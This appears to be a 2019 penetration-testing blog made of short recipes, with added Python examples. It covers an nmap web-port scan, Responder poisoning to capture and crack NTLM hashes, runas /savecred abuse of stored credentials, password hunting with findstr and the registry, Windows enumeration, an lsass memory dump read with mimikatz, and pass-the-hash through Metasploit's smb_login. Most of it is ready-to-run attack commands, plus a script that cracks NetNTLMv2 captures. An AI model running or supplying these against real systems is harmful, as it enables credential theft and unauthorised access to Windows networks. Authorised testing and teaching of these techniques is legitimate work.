Thursday, October 31, 2019

Nmap Open Web Ports to CSV

Scan the common web ports (80, 443, 8080, 8443) with nmap and turn the grepable (-oG) output into one CSV row per host (ip,hostname,80,443,8080,8443) with sed, keeping only hosts that have at least one of those ports open. {targets} is whatever you would normally give nmap (an IP, a range, a CIDR, or -iL file):

nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 -oG - {targets} | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^ ]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open

The egrep drops the "# Nmap ..." comment lines and the "Host: ... Status: Up" lines, so only the "Host: ... Ports: ..." lines reach sed. The sed pattern expects all four ports to be listed in that order; if nmap summarises some of them as a trailing "Ignored State: ..." note instead of listing them, the line does not match and passes through unchanged. The final grep open keeps only hosts with at least one open port (and any unmatched lines that happen to contain the word).
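The same transformation as a small parser, added here as an example and not code from the original post. It handles the "Ignored State:" summary that the sed one-liner cannot, accepts any list of ports, and when run as a script reads nmap's -oG output from stdin so it drops into the same pipeline. The sample scan output is constructed (the 192.0.2.0/29 hosts and the example.test names are made up), and the script name gnmap2csv.py is an assumption.

```python
import csv
import io
import re
import sys

# "Host: <ip> (<hostname>)" opens every -oG host line; hostname is empty when nmap has none.
HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")
# nmap folds ports that share one state into a trailing "Ignored State: closed (3)" note
IGNORED_RE = re.compile(r"Ignored State: ([a-z|]+)")


def parse_gnmap(text, ports):
    """Yield (ip, hostname, state, state, ...) per host, one state per requested port,
    for hosts where at least one of those ports is open."""
    for line in text.splitlines():
        if line.startswith("#") or "Ports:" not in line:
            continue  # banner/footer comments and the "Status: Up" lines
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        ports_part = line.split("Ports: ", 1)[1]
        ign = IGNORED_RE.search(ports_part)
        default_state = ign.group(1) if ign else "unknown"  # state of ports nmap did not list
        if ign:
            ports_part = ports_part[:ign.start()]
        states = {}
        for entry in ports_part.strip().split(", "):
            if "/" not in entry:
                continue
            num, state = entry.split("/", 2)[:2]  # 80/open/tcp//http/// -> ("80", "open")
            states[num] = state
        row = [ip, hostname] + [states.get(str(p), default_state) for p in ports]
        if "open" in row[2:]:
            yield tuple(row)


def to_csv(text, ports):
    """Render parse_gnmap() rows as CSV text with a header row."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(["ip", "hostname"] + [str(p) for p in ports])
    for row in parse_gnmap(text, ports):
        writer.writerow(row)
    return out.getvalue()


# Constructed sample of -oG output (not a real scan); hosts and names are made up.
SAMPLE = "\n".join([
    "# Nmap 7.80 scan initiated Thu Oct 31 10:00:00 2019 as: nmap -Pn -p 80,443,8080,8443 -oG - 192.0.2.0/29",
    "Host: 192.0.2.1 ()\tStatus: Up",
    "Host: 192.0.2.1 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, 8080/closed/tcp//http-proxy///, 8443/filtered/tcp//https-alt///",
    "Host: 192.0.2.2 (web.example.test)\tStatus: Up",
    "Host: 192.0.2.2 (web.example.test)\tPorts: 80/closed/tcp//http///, 443/closed/tcp//https///, 8080/open/tcp//http-proxy///, 8443/closed/tcp//https-alt///",
    "Host: 192.0.2.3 ()\tStatus: Up",
    "Host: 192.0.2.3 ()\tPorts: 80/filtered/tcp//http///, 443/filtered/tcp//https///, 8080/filtered/tcp//http-proxy///, 8443/filtered/tcp//https-alt///",
    "Host: 192.0.2.4 (app.example.test)\tStatus: Up",
    "Host: 192.0.2.4 (app.example.test)\tPorts: 8443/open/tcp//https-alt///\tIgnored State: closed (3)",
    "# Nmap done at Thu Oct 31 10:00:05 2019 -- 8 IP addresses (4 hosts up) scanned in 5.00 seconds",
])

if __name__ == "__main__":
    # nmap -Pn -p 80,443,8080,8443 -oG - {targets} | python3 gnmap2csv.py 80 443 8080 8443
    wanted = [int(p) for p in sys.argv[1:]] or [80, 443, 8080, 8443]
    source = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    sys.stdout.write(to_csv(source, wanted))
```

Run without a pipe it prints the CSV for the constructed sample; hosts 192.0.2.1, .2 and .4 appear, .3 (all filtered) does not, and the fourth host's unlisted ports take the "closed" state from the Ignored State note.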


Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

(-I: the interface to poison on; -r: also answer NetBIOS wredir suffix queries; -b: ask HTTP victims for Basic instead of NTLM authentication, which hands over the password in cleartext. Responder needs root.)

cd /usr/share/responder/logs

Responder writes one file per protocol and client, named like SMB-NTLMv2-SSP-<client ip>.txt, so crack each family with the matching john format:

john --format=netntlm SMB-NTLMv1-SSP-*.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-*.txt --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all Mac Address Vendors around you (Arp -a)

# print all mac address vendors around you (using the arp table and the
# mac-vendor-lookup python library: pip install mac-vendor-lookup)

import re
import subprocess
from mac_vendor_lookup import MacLookup

# matches Windows arp output (00-11-22-33-44-55) as well as Linux/macOS (00:11:22:33:44:55)
MAC_RE = re.compile(r"(?i)([0-9a-f]{2}[-:]){5}[0-9a-f]{2}")

lookup = MacLookup()  # build once; it loads the OUI list on first use
arp_table = subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout
for line in arp_table.splitlines():
    for item in line.split():
        if MAC_RE.fullmatch(item):
            try:
                print(item + ": " + lookup.lookup(item))
            except KeyError:  # the library's VendorNotFoundError subclasses KeyError
                print(item + ": not found")

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:


Any target/user pair listed there can be used without knowing the password, because /savecred makes runas pull the stored credential for that user instead of prompting:

runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /si password c:\*.ps1

(/s recurses into subdirectories, /i ignores case; repeat for *.txt, *.xml, *.ini, *.config and *.bat, where credentials usually end up)

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S

(/F is the search string, /S recurses, /t REG_SZ limits hits to string values; with /K only key names are matched, without it value names and data are searched too, which is where the passwords themselves live)

Get File Shares Exposed "net share"

>net share

Share name   Resource                            Remark

C$           C:\                                 Default share
IPC$                                             Remote IPC
print$       C:\WINDOWS\system32\spool\drivers   Printer Drivers
ADMIN$       C:\WINDOWS                          Remote Admin

Password Login Settings "net accounts"

>net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION

Get Mapped Network Shares by Drive Letter "wmic logicaldisk"

>wmic logicaldisk get caption, description, providername
Caption  Description         ProviderName
C:       Local Fixed Disk
X:       Network Connection  \\server\user\XXX
Y:       Network Connection  \\server\public

Print all environment variables "set"

>set

CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
...

Patches Installed wmic qfe

>wmic qfe

(full output has the columns Caption, CSName, Description, FixComments, HotFixID, InstallDate, InstalledBy, InstalledOn, Name, ServicePackInEffect, Status; the empty ones are dropped below, or ask for just the useful ones with wmic qfe get HotFixID,Description,InstalledOn)

CSName  Description      HotFixID   InstalledBy          InstalledOn
PCNAME  Update           KB4514366  NT AUTHORITY\SYSTEM  XX/XX/XXXX
PCNAME  Update           KB4515855
PCNAME  Update           KB4465065  NT AUTHORITY\SYSTEM  XX/XX/XXXX
PCNAME  Security Update  KB4470788                       XX/XX/XXXX
PCNAME  Security Update  KB4489907                       XX/XX/XXXX
PCNAME  Security Update  KB4503308  NT AUTHORITY\SYSTEM  XX/XX/XXXX

Windows Systeminfo

>systeminfo | findstr /C:"OS Name" /C:"OS Version" /C:"BIOS Version"

OS Name:                   Microsoft Windows 10
OS Version:                10.0.XXX N/A Build XXXX
BIOS Version:              Dell Inc. 1.XX, XX/XX/XXX

Tuesday, October 15, 2019

Powershell listening on a port

# Listen on TCP 1080, accept one client, echo back every line it sends
$listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Any, 1080)
$listener.Start()
$client = $listener.AcceptTcpClient()
$stream = $client.GetStream()
$buffer = New-Object System.Byte[] 2048

do {
    # Read() blocks until data arrives and returns 0 when the client closes the connection
    $read = $stream.Read($buffer, 0, $buffer.Length)
    if ($read -gt 0) {
        # decode only the bytes actually received, not the whole 2048-byte buffer
        $data = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $read).TrimEnd()
        if ($data.Length -gt 0) {
            Write-Output ("RECEIVED : [{0}]" -f $data)
            $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
            $stream.Write($sendBack, 0, $sendBack.Length)
            Write-Output ("SENT BACK: [{0}]" -f $data)
        }
    }
} while ($read -gt 0)

$client.Close()
$listener.Stop()

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -accepteula -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Load the dump in mimikatz (on any machine, using a mimikatz of the same bitness as the dumped lsass) and list the logon sessions:

mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

Username : {user}
Domain   : {domain}
NTLM     : {NTLM Hash}

Pass the NT hash with Metasploit's smb_login. SMBPass takes the LM:NT form; aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password and stands in for the LM half, which modern Windows does not store:

use auxiliary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run

good blog

When you can & cannot Pass the Hash

great blog

From a pentesting perspective:
  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.
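The relationship between the two hash types, as an added example that is not code from the original posts or from the quoted blog. It computes the NT hash (what Mimikatz, the SAM and NTDS.dit give you), derives a NetNTLMv2 response from it the way the client does (what Responder captures), and then verifies a capture line against candidate passwords the way the john command in the Responder post does. The capture is constructed inside the block from an assumed user (jdoe), domain (CORP), password, server challenge and minimal NTLMv2 blob; nothing here is real data. MD4 is implemented inline (RFC 1320) because hashlib's md4 is missing wherever OpenSSL runs without its legacy provider.

```python
# NT hash          = MD4(UTF-16LE(password))                                  (Mimikatz / SAM / NTDS)
# NTLMv2 key       = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
# NetNTLMv2 proof  = HMAC-MD5(NTLMv2 key, server_challenge || blob)            (Responder capture)
# The proof is bound to a fresh server challenge, so it cannot be replayed; the NT hash is the key
# that produces every proof, so it can.
import hashlib
import hmac
import struct

EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty password


def _lrot(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); only needed because NT hashes are MD4."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _lrot(a + fn(b, c, d) + X[k] + const, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = [(x + y) & 0xFFFFFFFF for x, y in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_key(nt: bytes, user: str, domain: str) -> bytes:
    # user is upper-cased; the domain/target name is used exactly as the client sent it
    return hmac.new(nt, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def netntlmv2_proof(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntlmv2_key(nt, user, domain), server_challenge + blob, hashlib.md5).digest()


def build_capture(user, domain, password, server_challenge, blob):
    """Produce a line in the user::domain:challenge:proof:blob layout Responder logs."""
    proof = netntlmv2_proof(nt_hash(password), user, domain, server_challenge, blob)
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), proof.hex(), blob.hex())


def verify_netntlmv2(line: str, password: str) -> bool:
    """What john --format=netntlmv2 does per candidate: recompute the proof and compare."""
    user, _, domain, challenge, proof, blob = line.split(":")
    expected = netntlmv2_proof(nt_hash(password), user, domain,
                               bytes.fromhex(challenge), bytes.fromhex(blob))
    return hmac.compare_digest(expected, bytes.fromhex(proof))


def crack(line: str, wordlist):
    for candidate in wordlist:
        if verify_netntlmv2(line, candidate):
            return candidate
    return None


def smb_login_pass(nt: bytes) -> str:
    """LM:NT string for the smb_login SMBPass option, using the empty LM hash as the LM half."""
    return EMPTY_LM_HASH + ":" + nt.hex()


# Constructed capture (assumed user/domain/password, fixed challenge, minimal blob:
# version header, zero timestamp, client challenge, reserved, empty AV pair list).
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = bytes.fromhex("0101000000000000" "0000000000000000" "aabbccddeeff0011" "00000000" "00000000" "00000000")
CAPTURE = build_capture("jdoe", "CORP", "Summer2019!", SERVER_CHALLENGE, BLOB)

if __name__ == "__main__":
    print("capture :", CAPTURE)
    print("cracked :", crack(CAPTURE, ["123456", "password", "Summer2019!"]))
    print("SMBPass :", smb_login_pass(nt_hash("Summer2019!")))
```

Note what verify_netntlmv2 needs: the user and domain straight from the capture line plus a password guess. With only the NT hash you could skip nt_hash() and still compute the proof, which is exactly why the NT hash is passable and the captured proof, tied to that one server challenge, is not.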